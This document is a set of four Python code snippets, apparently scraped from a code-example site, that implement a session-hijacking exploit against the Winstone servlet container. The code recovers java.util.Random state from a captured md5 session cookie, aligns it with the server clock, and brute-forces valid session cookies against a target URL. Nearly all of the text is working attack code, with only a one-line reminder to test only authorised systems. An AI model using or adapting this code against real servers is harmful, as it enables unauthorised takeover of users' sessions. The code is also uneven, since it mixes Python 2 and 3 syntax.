Code example #1
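def hijackSession(url,IPAddr,serverPort,sessionsFileName,success_str):
    """Brute-force live Winstone session cookies from a recovered PRNG state.

    Each non-blank line of ``sessionsFileName`` is
    ``cookieName,timeMillisMin,timeMillisMax,PRNGseed,sessionCnt``: the cookie
    name, the millisecond window in which the target sessions were created,
    the recovered java.util.Random state (as accepted by
    ``JavaLCGMimic.forceSeed``) and how many sessions to look for.  For every
    millisecond in the window the candidate id
    ``md5("Winstone_<ip>_<port>_<millis><nextLong>")`` is built and submitted to
    ``url`` through ``isCookieValid``.  A hit advances the generator by one
    ``nextLong`` before scanning on, on the assumption that the next session
    consumed the next output.

    Every candidate is one request to the target, so the cost is up to
    ``timeMillisMax - timeMillisMin`` requests per line -- keep the window
    tight, and only point this at systems you are authorised to test.

    Args:
        url: target URL probed by ``isCookieValid``.
        IPAddr: server IP address string that Winstone mixed into the id.
        serverPort: server port; ``str`` is applied so an int is accepted too.
        sessionsFileName: CSV file described above; blank lines are skipped.
        success_str: success marker passed through to ``isCookieValid``.

    Returns:
        None.  Hits are printed as ``[!!!] Found valid cookie: <name>=<id>``.

    Raises:
        ValueError: on a malformed line (wrong field count or non-integer
            field).
        IOError / OSError: if the sessions file cannot be opened.
    """
    prefix = "Winstone_" + IPAddr + "_" + str(serverPort) + "_"
    # Hash the constant prefix once; each candidate starts from a copy of this
    # state.  The explicit encode keeps this working on Python 3 as well.
    base_md5 = hashlib.md5(prefix.encode("ascii"))

    with open(sessionsFileName, "r") as f:
        for line in f:
            line = line.rstrip("\r\n")
            if not line:
                continue

            cookieName, timeMillisMin, timeMillisMax, PRNGseed, sessionCnt = line.split(",")
            timeMillisMin = int(timeMillisMin)
            timeMillisMax = int(timeMillisMax)
            PRNGseed = int(PRNGseed)
            sessionCnt = int(sessionCnt)

            # Replay the generator from the recovered state once per line instead
            # of re-seeding and re-advancing it for every millisecond tried.
            g = JavaLCGMimic(0)
            g.forceSeed(PRNGseed)
            seek = 1
            PRNGout = g.nextLong()

            for tryMillis in range(timeMillisMin, timeMillisMax):
                if seek > sessionCnt:
                    break

                h = base_md5.copy()
                # No separator between millis and the nextLong output: that is the
                # format the target uses, so it must be reproduced exactly.
                h.update((str(tryMillis) + str(PRNGout)).encode("ascii"))
                cookieToTry = h.hexdigest()

                if isCookieValid(url, cookieName + "=" + cookieToTry, success_str):
                    print("[!!!] Found valid cookie: %s=%s" % (cookieName, cookieToTry))
                    # Next session is expected to use the following PRNG output;
                    # keep scanning the same window from here.
                    seek += 1
                    PRNGout = g.nextLong()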
Code example #2
File: RecoverPRNGState.py  Project: votadlos/JavaCG
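def recoverPRNGStateWorker(cookie,timeMillisEstimate,workQueue,IPAddr,serverPort,seedValue):
    """Worker: recover the java.util.Random state behind one Winstone session id.

    Work items are ``(PRNGMillisMin, PRNGMillisMax, PRNGseek)`` tuples taken
    from ``workQueue``: a range of millisecond values to try as the generator
    *seed* and the number of ``nextLong`` outputs to skip before the one mixed
    into the cookie.  Each item is re-queued with ``PRNGseek + 1`` before it is
    processed, so the search deepens until ``PRNGseekMax``.  For every seed the
    worker rebuilds ``md5("Winstone_<ip>_<port>_<timeMillis><nextLong>")`` over
    ``[timeMillisEstimate - timeMillisDelay, timeMillisEstimate + 1000)`` and
    compares it with ``cookie``; on a match ``seedValue.value`` is set to the
    generator's ``seed`` so the other workers stop.

    Args:
        cookie: hex md5 session id captured from the target.
        timeMillisEstimate: estimated creation time of ``cookie`` in epoch
            milliseconds.
        workQueue: shared queue of work items (multiprocessing-style ``get``/
            ``put``; an empty non-blocking ``get`` raises ``queue.Empty``).
        IPAddr: server IP address string.
        serverPort: server port; ``str`` is applied so an int is accepted too.
        seedValue: shared ``.value`` holder.  ``0`` doubles as "not found yet",
            so a genuine seed of 0 cannot be signalled through it.

    Returns:
        0 when the seed was found (by this or another worker), -1 when the
        search depth is exhausted, None when the queue is empty.

    Globals:
        PRNGseekMax, timeMillisDelay -- search bounds set by the caller.
    """
    global PRNGseekMax
    global timeMillisDelay

    # multiprocessing queues raise the stdlib Empty exception on a non-blocking
    # get; the original let it propagate and killed the worker.
    try:
        import queue
    except ImportError:  # Python 2
        import Queue as queue

    prefix = "Winstone_" + IPAddr + "_" + str(serverPort) + "_"
    # Hash the constant prefix once; every candidate starts from a copy of it.
    base_md5 = hashlib.md5(prefix.encode("ascii"))
    millisWindow = range(timeMillisEstimate - timeMillisDelay, timeMillisEstimate + 1000)

    while True:
        if seedValue.value != 0:
            return 0

        try:
            PRNGMillisMin, PRNGMillisMax, PRNGseek = workQueue.get(block=False)
        except queue.Empty:
            return None

        # Re-queue first, then check depth (original order): an over-deep item
        # thus reaches the other workers and they exit on it as well.
        workQueue.put((PRNGMillisMin, PRNGMillisMax, PRNGseek + 1))

        if PRNGseek > PRNGseekMax:
            return -1

        for PRNGMillis in range(PRNGMillisMin, PRNGMillisMax):
            # Stop early once any worker has published the seed; one shared
            # read per seed is negligible next to the md5 loop below.
            if seedValue.value != 0:
                return 0

            g = JavaLCGMimic(PRNGMillis)
            PRNGout = -1
            for _ in range(PRNGseek):
                PRNGout = g.nextLong()

            for timeMillis in millisWindow:
                h = base_md5.copy()
                # No separator between millis and the nextLong output -- target format.
                h.update((str(timeMillis) + str(PRNGout)).encode("ascii"))
                if h.hexdigest() == cookie:
                    seedValue.value = g.seed
                    return 0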
Code example #3
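def recoverPRNGStateWorker(cookie,timeMillisEstimate,workQueue,IPAddr,serverPort,seedValue):
    """Worker: recover the java.util.Random state behind one Winstone session id.

    Work items are ``(PRNGMillisMin, PRNGMillisMax, PRNGseek)`` tuples taken
    from ``workQueue``: a range of millisecond values to try as the generator
    *seed* and the number of ``nextLong`` outputs to skip before the one mixed
    into the cookie.  Each item is re-queued with ``PRNGseek + 1`` before it is
    processed, so the search deepens until ``PRNGseekMax``.  For every seed the
    worker rebuilds ``md5("Winstone_<ip>_<port>_<timeMillis><nextLong>")`` over
    ``[timeMillisEstimate - timeMillisDelay, timeMillisEstimate + 1000)`` and
    compares it with ``cookie``; on a match ``seedValue.value`` is set to the
    generator's ``seed`` so the other workers stop.

    The original mixed tabs and spaces for indentation (a ``TabError`` on
    Python 3); this version is space-indented throughout.

    Args:
        cookie: hex md5 session id captured from the target.
        timeMillisEstimate: estimated creation time of ``cookie`` in epoch
            milliseconds.
        workQueue: shared queue of work items; ``get(timeout=1)`` raising
            ``TQ.Empty`` ends the worker.
        IPAddr: server IP address string.
        serverPort: server port; ``str`` is applied so an int is accepted too.
        seedValue: shared ``.value`` holder.  ``0`` doubles as "not found yet",
            so a genuine seed of 0 cannot be signalled through it.

    Returns:
        0 when the seed was found (by this or another worker); None when the
        queue is empty, an item is unreadable, or the search depth is exhausted.

    Globals:
        PRNGseekMax, timeMillisDelay -- search bounds set by the caller.
    """
    global PRNGseekMax
    global timeMillisDelay

    prefix = "Winstone_" + IPAddr + "_" + str(serverPort) + "_"
    # Hash the constant prefix once; every candidate starts from a copy of it.
    base_md5 = hashlib.md5(prefix.encode("ascii"))
    millisWindow = range(timeMillisEstimate - timeMillisDelay, timeMillisEstimate + 1000)

    while True:
        if seedValue.value != 0:
            return 0

        try:
            PRNGMillisMin, PRNGMillisMax, PRNGseek = workQueue.get(timeout=1)
        except TQ.Empty:
            print("[!] Queue is EMPTY")
            return

        if PRNGMillisMin is None:
            print("[!] Cannot read from queue")
            return

        # Re-queue first, then check depth (original order): an over-deep item
        # thus reaches the other workers and they exit on it as well.
        workQueue.put((PRNGMillisMin, PRNGMillisMax, PRNGseek + 1))

        if PRNGseek > PRNGseekMax:
            return

        for PRNGMillis in range(PRNGMillisMin, PRNGMillisMax):
            # Stop early once any worker has published the seed; one shared
            # read per seed is negligible next to the md5 loop below.
            if seedValue.value != 0:
                return 0

            g = JavaLCGMimic(PRNGMillis)
            PRNGout = -1
            for _ in range(PRNGseek):
                PRNGout = g.nextLong()

            for timeMillis in millisWindow:
                h = base_md5.copy()
                # No separator between millis and the nextLong output -- target format.
                h.update((str(timeMillis) + str(PRNGout)).encode("ascii"))
                if h.hexdigest() == cookie:
                    print("[*] Found PRNGMillis = %s" % PRNGMillis)
                    print("[*] Found timeMillis = %s" % timeMillis)
                    seedValue.value = g.seed
                    return 0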
Code example #4
def syncMillisAndPRNG(url,PRNGseed,IPAddr,serverPort,timezone):
        """Align a known PRNG state with the server clock using one fresh session.

        Fetches a new session from ``url`` via ``givemecookie``, derives a
        creation timestamp from the date string it returns, and then searches
        for the ``(timeMillis, PRNGseek)`` pair that reproduces the cookie as
        ``md5("Winstone_<ip>_<port>_<timeMillis><nextLong>")`` when
        ``JavaLCGMimic`` is forced to ``PRNGseed`` and advanced ``PRNGseek``
        times (1..PRNGseekMax).

        Args:
            url: target URL passed to ``givemecookie``.
            PRNGseed: recovered java.util.Random state (see ``forceSeed``).
            IPAddr: server IP address string.
            serverPort: server port as a string (concatenated, not converted).
            timezone: pytz zone name the parsed time is shifted into.

        Returns:
            ``(timeMillis, g.seed, PRNGseek)`` on a match; None when no cookie
            could be fetched or nothing matched within the search bounds.

        Globals:
            PRNGseekMax, timeMillisDelay -- search bounds set by the caller.
            CookieName is declared but not referenced in this body.
        """
        global CookieName
        global PRNGseekMax
        global timeMillisDelay
        
        # t[0] is taken as a "name=value" cookie, t[-1] as an RFC 1123 style
        # date (presumably the response's Date header -- verify in givemecookie).
        t = givemecookie(url)

        if t == None:

            return

        cookie = t[0].split('=')[-1]
        st = time.strptime(t[-1], '%a, %d %b %Y %H:%M:%S %Z')
        # NOTE(review): time.mktime() interprets a struct_time as *local* time,
        # so this chain yields the parsed wall-clock time re-read as local,
        # shifted into ``timezone``, and read as local again -- not the epoch of
        # a GMT date (that would be calendar.timegm(st)).  It only lines up with
        # the server's currentTimeMillis for the zone setup the author had in
        # mind; confirm before trusting the millis window below.
        dt = datetime.fromtimestamp(time.mktime(st))
        dt = dt.replace(tzinfo=pytz.utc).astimezone(pytz.timezone(timezone))
        
        timeSecs = int(time.mktime(dt.timetuple()))

        # Depth-first over how many nextLong outputs were consumed before this
        # session, then over a millisecond window around the parsed time.
        PRNGseek = 1
        while True:
            if PRNGseek > PRNGseekMax:
                break

            g = JavaLCGMimic(0)
            g.forceSeed(PRNGseed)
            
            PRNGout = -1
            for s in range(PRNGseek):
                PRNGout = g.nextLong()

            # Window: timeMillisDelay ms before the parsed second up to 1 s after.
            for timeMillis in range((timeSecs*1000)-timeMillisDelay,(timeSecs*1000)+1000):
                md5dig = hashlib.md5()
                # No separator between millis and the nextLong output -- target format.
                md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout))
                
                if md5dig.hexdigest() == cookie:
                    print "[.] Parameters found:","timeMillis =",timeMillis,"Seek =",PRNGseek
                    return (timeMillis,g.seed,PRNGseek)

            PRNGseek += 1